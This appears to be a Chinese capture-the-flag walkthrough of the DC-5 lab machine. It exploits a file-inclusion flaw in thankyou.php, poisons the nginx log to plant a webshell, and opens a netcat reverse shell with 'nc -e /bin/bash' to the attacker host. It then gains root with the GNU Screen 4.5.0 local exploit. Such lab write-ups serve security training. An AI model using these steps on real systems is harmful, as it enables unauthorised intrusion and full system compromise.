DC系列靶机5通关教程

news2024/10/6 18:36:43

信息收集

主机扫描

sudo arp-scan -l

在这里插入图片描述

端口扫描

nmap -p- -A 192.168.16.172

image-20230916141935517

漏洞发现

浏览器访问靶机IP

image-20230916142103116

在Contact找到类似提交数据的地方

在这里插入图片描述

点击submit,数字发生变化。不断刷新的话,数字依然会发生变化

在这里插入图片描述

使用bp抓包发送重发器查看数据包

image-20230916142551068

再次点击发送查看数据返回包

image-20230916142652371

不断重发数据发现footer不断变化,感觉可能存在一个独立的脚本,爆破目录查看一下

dirsearch -u 192.168.16.172 -i 200

命令解释:

dirsearch -u 192.168.16.172 -i 200 是一个用于目录扫描的命令,下面对该命令进行详细解释:

  • dirsearch:是一个目录扫描工具,用于探测Web服务器上的目录和文件。
  • -u 192.168.16.172:指定要扫描的目标URL或IP地址。在这个示例中,目标是 192.168.16.172。你可以替换这个IP地址为需要扫描的实际目标。
  • -i 200:指定要忽略的HTTP状态码。在这个示例中,200 表示忽略返回状态码为200的响应。也就是说,当目标返回200状态码时,不会将其视为敏感路径或文件。

通过执行这条命令,dirsearch 工具将发送不同的HTTP请求到目标URL,并根据目标服务器的响应来确定是否存在可以访问的目录、文件或敏感路径。它可以帮助发现Web应用程序中可能存在的配置错误、暴露的资源、备份文件等问题。

image-20230916143735744

浏览器访问192.168.16.172这个页面

image-20230916144026968

刷新页面进行查看,刷新页面后数字发生变化

在这里插入图片描述

将bp数据包中的GET请求更改为/thankyou.php?file=footer.php然后点击发送

在这里插入图片描述

再点击发送进行查看

image-20230916144504398

可以确定这里可能存在文件包含漏洞

漏洞利用

再将访问路径改为/etc/passwd可以看到passwd文件

image-20230916144646967

说明了程序代码再处理文件包含是没有严格控制,我们可以把访问路径更改为木马文件

image-20230916144847036

image-20230916145022954

发现报了404未找到的错误

对于配置了nginx的网站,无论网站有什么操作,都会被记录在/var/log/nginx/access.log/var/log/nginx/error.log

/thankyou.php?file=/var/log/nginx/access.log

image-20230916150809591

木马上传成功,利用蚁剑进行连接

http://192.168.16.172/thankyou.php?file=/var/log/nginx/access.log

image-20230916151152459

进行反弹shell

kali进行监听

nc -lvvp 8848		#监听网段中所有8848端口

image-20230916151453996

利用蚁剑中的虚拟终端,反弹shell到攻击机kali上

nc -e /bin/bash 192.168.16.176 8848

image-20230916151655133

image-20230916152152490

再看kali已经连接到了

image-20230916152545915

使用python脚本开启交互模式

python -c 'import pty;pty.spawn("/bin/bash")'

image-20230916152801737

查看id,发现只是普通用户的权限

image-20230916152945236

权限提升

find / -user root -prem /4000 2>/dev/null

image-20230916153431607

经过查找得知GNU Screen是一款由GNU计划开发的用于命令行终端切换的自由软件。用户可以通过该软件同时连接多个本地或远程的命令行会话,并在其间自由切换。GNU Screen可以看作是窗口管理器的命令行界面版本。它提供了统一的管理多个会话的界面和相应的功能。

尝试用searchsploit搜索是否存在漏洞,重新打开一个终端进行漏洞查找

searchsploit screen 4.5.0

image-20230916153727334

找出41154.sh的绝对路径

searchsploit -p linx/local/41151.sh

image-20230916154046191

查看文件内容

cat /usr/share/exploitdb/exploits/linux/local/41154.sh

image-20230916154658425

按照文件的说明,可分为三部分,将第一个框里内容保存为第一文件,名为libhax.c,然后使用黄色选取的命令编译,编译结束会生成libhax.so文件。

第二个框里内容保存为rootshell.c文件,使用黄色选区的命令编译,编译结束后生成rootshell文件。

将第三个框里内容保存为第三个文件,保存为run.sh 。 这个名字随意。
image-20230916160056079

通过蚁剑把libhax.crootshell.c拖进靶机跟目录下的tmp目录下

image-20230916160306990

在虚拟终端中对libhax.crootshell.c这两个文件进行编译

image-20230916160652040

image-20230916161235492

在蚁剑中点击文件管理,进入根目录下的tmp目录进行刷新后编译的文件就出来了

image-20230916161416327

然后把 run.sh也通过蚁剑拖进靶机根目录下的tmp目录中,注意是 /tmp/

image-20230916161547728

那么原来的libhax.crootshell.c这两个文件可以删除了,因为已经编译好了,留着也没有价值

image-20230916161742668

回到通过python得到的交互式的shell里,切换到/tmp目录下

image-20230916162001033

image-20230916162032727

运行run.sh输入bash ./run.sh进行提权

image-20230916162142278

通过查看id已知是root用户

进入/root查看是否有flag

image-20230916162413908

总结

信息收集
	主机发现  netdiscouver
	端口扫描  nmap
	目录爆破  dirsearch
漏洞利用
	bp抓包分析数据包,测试到有文件包含漏洞
	木马上传,查看日志
	反弹shell
	python交互shell
提权
	find / -user root -perm /4000 2>/dev/null#找到所有具有root权限的可执行文件
	searchsploit screen 4.5.0#通过searchsploit找到Screen这款由GNU计划开发的用于命令行终端切换的自由软件的漏洞
	libhax.c和rootshell.c文件的编译  run.sh
	bash ./run.sh  提权

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1017852.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

修改了Android Studio 中的这两个面板配置后,代码写的更舒服了~

本文已同步发表于我的微信公众号,微信搜索 代码说 即可关注,欢迎与我沟通交流。 一、 增加打开文件的数量及展示方式 如图,默认AS中打开的文件个数是10个,当超过10个时,超过的部分会直接隐藏,甚至会直接把之…

TCP详解之重传机制

TCP详解之重传机制 TCP 实现可靠传输的方式之一,是通过序列号与确认应答。 在 TCP 中,当发送端的数据到达接收主机时,接收端主机会返回一个确认应答消息,表示已收到消息。 但在错综复杂的网络,并不一定能如上图那么顺…

Oracle SQL操作和查询

文章目录 一、SQL简介二、数据类型讲解三、创建表和约束1.表结构2. 更新表结构3.约束 四、DML语句1.INSERT2.序列号3.UPDATE4.删除语句5.多行插入 五、DQL语句1.简单查询语句1.1 知识点讲解1.2 案例讲解 2.聚合函数3.分组查询4.多表查询 一、SQL简介 SQL是结构化查询语言&…

Procmon.exe在cuckoo中的使用

背景 最近研究了下procmon.exe,该工具用途可大了,Procmon是微软出品用于监视Windows系统里程序的运行情况,监视内容包括该程序对注册表的读写、 对文件的读写、网络的连接、进程和线程的调用情况,procmon 是一款超强的系统监视软…

typescript字面量类型

typescript 字面量介绍 在TypeScript中,字面量是指在代码中直接使用的具体值,如字符串、数字、布尔值等。字面量类型是TypeScript中的一种特殊类型,它用于定义一组有限的值,并且可以在定义变量或函数时使用字面量作为具体值&…

基于Java的养老院管理系统的设计与实现(亮点:多角色、登录验证码、留言反馈)

养老院管理系统 一、前言二、我的优势2.1 自己的网站2.2 自己的小程序(小蔡coding)2.3 有保障的售后2.4 福利 三、开发环境与技术3.1 MySQL数据库3.2 Vue前端技术3.3 Spring Boot框架3.4 微信小程序 四、功能设计4.1 主要功能描述 五、系统实现5.1 养老院…

【基础篇】四、SpringBoot整合第三方技术

文章目录 1、SpringBoot整合Junit2、SpringBoot整合MyBatis3、SpringBoot整合MyBatisPlus4、SpringBoot整合Druid 1、SpringBoot整合Junit 步骤: 导入测试对应的starter测试类使用SpringBootTest修饰使用自动装配的形式添加要测试的对象 SpringBootTest class Spri…

IDEA(2023)解决运行乱码问题

😇作者介绍:一个有梦想、有理想、有目标的,且渴望能够学有所成的追梦人。 🎆学习格言:不读书的人,思想就会停止。——狄德罗 ⛪️个人主页:进入博主主页 🗼专栏系列:无 &#x1f33c…

Nginx 相关介绍(Nginx是什么?能干嘛?)

Nginx的产生 没有听过Nginx?那么一定听过它的"同行"Apache吧!Nginx同Apache一样都是一种WEB服务器,基于REST架构风格,以统一资源描述符(Uniform Resources Identifier)URI或者统一资源定位符(Uniform Resources Locator…

【算法专题突破】滑动窗口 - 串联所有单词的子串(15)

目录 1. 题目解析 2. 算法原理 3. 代码编写 写在最后: 1. 题目解析 题目链接:30. 串联所有单词的子串 - 力扣(LeetCode) 这道题其实也很好理解,看一下示例就基本知道是什么意思了, 主要就是找 s 里面…

day21算法

常见的七种查找算法: ​ 数据结构是数据存储的方式,算法是数据计算的方式。所以在开发中,算法和数据结构息息相关。今天的讲义中会涉及部分数据结构的专业名词,如果各位铁粉有疑惑,可以先看一下哥们后面录制的数据结构…

Ubuntu不能上网解决办法

问题及现象 Ubuntu的虚拟机(18.04)总是莫名就不能上网了。 使用ifconfig -a 查看,ensxx(xx为虚拟机分配的id号)对应的网卡有mac地址,但是没有分配ip地址。 Network中也没有Wired的选项。 临时解决方案 使…

深入学习 Redis Cluster - 集群缩容(全网最详细)

目录 一、集群缩容 1.1、准备环境 1.2、第一步,删除从节点 1.3、第二步,重新分配 slots 第一次分配:分配给 106 1365 个 slots 第二次分配:分配给102 1365 个 slots 此时查看集群状态,可以看到 110 节点不再持有…

【技术分享】NetLogon于域内提权漏洞(CVE-2020-1472)

一、漏洞介绍 CVE-2020-1472是一个Windows域控中严重的远程权限提升漏洞。攻击者在通过NetLogon(MS-NRPC)协议与AD域控建立安全通道时,可利用该漏洞将AD域控的计算机账号密码置为空,从而控制域控服务器。该漏洞适用于Win2008及后…

C#实现钉钉自定义机器人发送群消息帮助类

一、自定义机器人发送群消息使用场景 在企业中,针对一些关键指标内容(如每天的生产产量、每天的设备报警信息等信息),需要同时给多人分享,此时就可以将需要查看这些数据的人员都拉到一个群中,让群里的机器人将这些关键指标内容推送到群里即可【(目前已实现在钉钉群里创建…

Pytorch-CNN-Mnist

文章目录 model.pymain.py网络设置注意事项及改进运行截图 model.py import torch.nn as nn class CNN_cls(nn.Module):def __init__(self,in_dim28*28):super(CNN_cls,self).__init__()self.conv1 nn.Conv2d(1,32,1,1)self.pool1 nn.MaxPool2d(2,2)self.conv2 nn.Conv2d(3…

2023上半年软件设计师上午题目总结

1 在计算机中系统总线用于连接 主存及外设部件 2 在由高速缓存、主存、硬盘构成的三级存储体系中,CPU执行指令时需要读取数据,DMA控制器和中断CPU发出的数据地址是 主存物理地址 。 DMA(Direct Memory Access)控制器是计算机硬…

Nacos深入原理从源码层面讲解

文章目录 1 Nacos原理1.1 Nacos架构1.2 注册中心原理1.3 SpringCloud服务注册1.4 NacosServiceRegistry实现1.4.1 心跳机制1.4.2 注册原理1.4.3 总结 1.5 服务提供者地址查询1.6 Nacos服务地址动态感知原理 1 Nacos原理 1.1 Nacos架构 Provider APP:服务提供者Cons…

STM32 学习笔记1:STM32简介

1 概述 STM32,从字面上来理解,ST 是意法半导体,M 是 Microelectronics 的缩写,32 表示 32 位,合起来理解,STM32 就是 ST 公司开发的 32 位微控制器。是一款基于 ARM 公司推出的基于 ARMv7 架构的 32 位 Co…

【详细教程hexo博客搭建】1、从零开始搭建一个能用的博客

1、开始 2.环境与工具准备 本教程主要面对的是Windows用户 操作系统:Windows10NodeGitHexo文本编辑器(强烈推荐VSCODE)GitHub 帐号一个域名(强烈推荐买个域名)云服务器(可选) 3.Node的安装 打开Node官网&#xff0…